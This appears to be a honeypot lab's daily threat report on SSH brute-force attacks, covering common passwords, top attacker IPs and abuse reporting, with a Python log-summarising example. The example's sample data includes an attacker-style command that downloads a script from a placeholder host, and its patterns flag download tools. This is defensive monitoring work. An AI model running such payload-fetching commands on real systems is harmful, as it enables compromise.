💀 critical 🤖 antigravity

Honeypot Threat Analysis — April 15, 2026

Critical threat level — 2,380 SSH connections and 365 commands from 72 IPs. The most intense attack day since deployment.

ssh-brute-force, honeypot, high-severity, threat-intelligence

Threat Landscape Overview

Critical threat level reached for the first time. 2,380 SSH connections with 365 post-authentication commands — this is sustained, automated exploitation at industrial scale. Interestingly, the unique IP count dropped to 72 (from 87 yesterday), meaning fewer but more aggressive attackers.

SSH Brute Force Analysis

A staggering 2,289 login attempts — the most since deployment. The most-tried passwords converged on the familiar global defaults: 123456, admin, 123, password, 1234. These five passwords alone likely accounted for over 60% of all attempts.

Top attacker 87.121.84.21 led the charge, followed by 45.156.87.99 (a host from a known bulletproof hosting provider), Vietnamese IP 118.70.80.186, and persistent scanners 92.118.39.92 and 80.66.66.10.

The 365 commands represent attackers who successfully “logged in” to the honeypot shell and executed reconnaissance. Common patterns include uname variants for system fingerprinting and attempts to download second-stage payloads. The concentration of attacks from fewer IPs suggests professional botnet operators rather than script kiddies.
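The metrics quoted in this section can be derived from raw session events as in the following added example, which is not the lab's own tooling. The JSON event schema, the sample lines (constructed, using documentation-range IPs), and the download tool names in the rules are assumptions.

```python
import json
import re
from collections import Counter

# Constructed sample events; the JSON schema is an assumption, not the lab's log format.
SAMPLE_LOG = """\
{"type": "login", "ip": "192.0.2.10", "password": "123456"}
{"type": "login", "ip": "192.0.2.10", "password": "admin"}
{"type": "login", "ip": "198.51.100.7", "password": "password"}
{"type": "login", "ip": "203.0.113.5", "password": "raspberry"}
{"type": "command", "ip": "192.0.2.10", "input": "uname -a"}
{"type": "command", "ip": "192.0.2.10", "input": "uname -s -v -n -r -m"}
{"type": "command", "ip": "198.51.100.7", "input": "cd /tmp; wget http://example.invalid/x.sh"}
{"type": "command", "ip": "198.51.100.7", "input": "ls -la"}
not-json line that a truncated write might leave behind
"""

COMMON_PASSWORDS = {"123456", "admin", "123", "password", "1234"}  # list from the report
# Match a tool only at the start of a command or after a shell separator.
RULES = [
    ("fingerprint", re.compile(r"(^|[;&|]\s*)uname\b")),
    ("download", re.compile(r"(^|[;&|]\s*)(wget|curl|tftp)\b")),  # assumed tool names
]

def classify(command):
    for name, pattern in RULES:
        if pattern.search(command):
            return name
    return "other"

def summarize(log_text):
    logins, commands, ips, common = Counter(), Counter(), set(), 0
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the daily run
        ips.add(event["ip"])
        if event["type"] == "login":
            logins[event["ip"]] += 1
            common += event["password"] in COMMON_PASSWORDS
        elif event["type"] == "command":
            commands[classify(event["input"])] += 1
    total = sum(logins.values())
    return {"unique_ips": len(ips), "login_attempts": total,
            "common_password_share": common / total if total else 0.0,
            "top_ip": logins.most_common(1)[0][0] if logins else None,
            "commands": dict(commands)}

if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_LOG), indent=2))
```

Anchoring the patterns to command boundaries keeps a line such as `echo uname` from being counted as fingerprinting.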

Community Defense

All attacker IPs reported to AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield. The 45.156.87.x range has been flagged as a persistent threat cluster.


This analysis was generated for the Raspberry Pi 5 honeypot lab in Barcelona, Spain. View the raw data report for complete metrics.